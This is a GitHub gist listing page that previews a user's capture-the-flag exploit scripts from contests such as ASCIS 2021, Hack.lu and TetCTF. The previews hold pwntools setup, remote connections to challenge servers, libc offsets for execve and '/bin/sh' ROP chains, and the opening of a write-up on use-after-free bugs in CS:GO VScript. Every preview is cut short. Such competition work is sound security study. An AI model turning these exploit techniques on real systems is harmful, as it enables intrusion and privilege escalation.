Skip to content

Instantly share code, notes, and snippets.

Avatar

Bien Pham kungfulon

View GitHub Profile
@kungfulon
kungfulon / exp.c
Created Oct 31, 2021
Hack.lu CTF 2021 Cloudinspect
View exp.c
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/mman.h>
#define INFO "[*] "
@kungfulon
kungfulon / ex2.py
Last active Oct 19, 2021
ASCIS 2021 Qualification Round - image_converter
View ex2.py
#!/usr/bin/env python3
import struct
import sys
libc = int(sys.argv[1], 16) - 0x270b3
setreuid = 0x117ab0
execve = 0xe62f0
binsh = 0x1b75aa
poprdx = 0x11c371
@kungfulon
kungfulon / exp.py
Last active Oct 17, 2021
ASCIS 2021 Qualification Round - pwn2win
View exp.py
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
r = remote('125.235.240.166', 33333)
# 1st boss
r.sendline(b'%p')
@kungfulon
kungfulon / exp.py
Created Oct 16, 2021
ASCIS 2021 Qualification Round - proxy
View exp.py
#!/usr/bin/env python3
from pwn import *
context.clear(arch='amd64', os='linux', endian='little')
libc = ELF('./libc-2.31.so')
MY_IP = b''
r = remote('125.235.240.166', 20120)
@kungfulon
kungfulon / csgo.md
Created Sep 6, 2021
ALLES! CTF 2021 - 🔥 Counter Strike: Squirrel Offensive
View csgo.md

🔥 Counter Strike: Squirrel Offensive

This challenge involves an old version of CS:GO VScript, which is vulnerable to a UAF bug and a type confusion bug.

UAF by resizing array in sort compare function

The sort function of squirrel array is array_sort in sqbaselib.cpp, which will call _qsort:

// v: VM, o: array object, func: compare func
@kungfulon
kungfulon / ex.py
Created Jan 3, 2021
TetCTF 2020 - cache_v1
View ex.py
#!/usr/bin/env python3
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'new-window']
l = ELF('./libc-2.31.so')
@kungfulon
kungfulon / secret_keeper.py
Created Nov 28, 2020
ASCIS 2020 Final - Secret Keeper (pwn01)
View secret_keeper.py
#!/usr/bin/env python3
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
context.terminal = ['tmux', 'sp', '-v', '-p', '90']
b = ELF('./secret_keeper')
l = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
@kungfulon
kungfulon / stage_1_2.py
Last active Apr 9, 2021
ASCIS 2020 - Pwnable challenges
View stage_1_2.py
#!/usr/bin/env python3
from pwn import *
context.os = 'linux'
context.arch = 'amd64'
b = ELF('./sandboxd')
l = ELF('./libc-2.31.so')
context.terminal = ['tmux', 'sp', '-h', '-p', '80']
View rps.py
#!/usr/bin/env python3
from pwn import *
import ctypes
context.os = 'linux'
context.arch = 'amd64'
LIBC = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')
@kungfulon
kungfulon / hash.cpp
Created Jun 5, 2020
Simple rolling hash
View hash.cpp
class Hash {
public:
Hash(const std::string &s) : hash1(s.size() + 1), hash2(s.size() + 1) {
if (base == -1) {
base = genBase(minBase, mod);
pow1.push_back(1);
pow2.push_back(1);
}
while (pow1.size() <= s.size()) {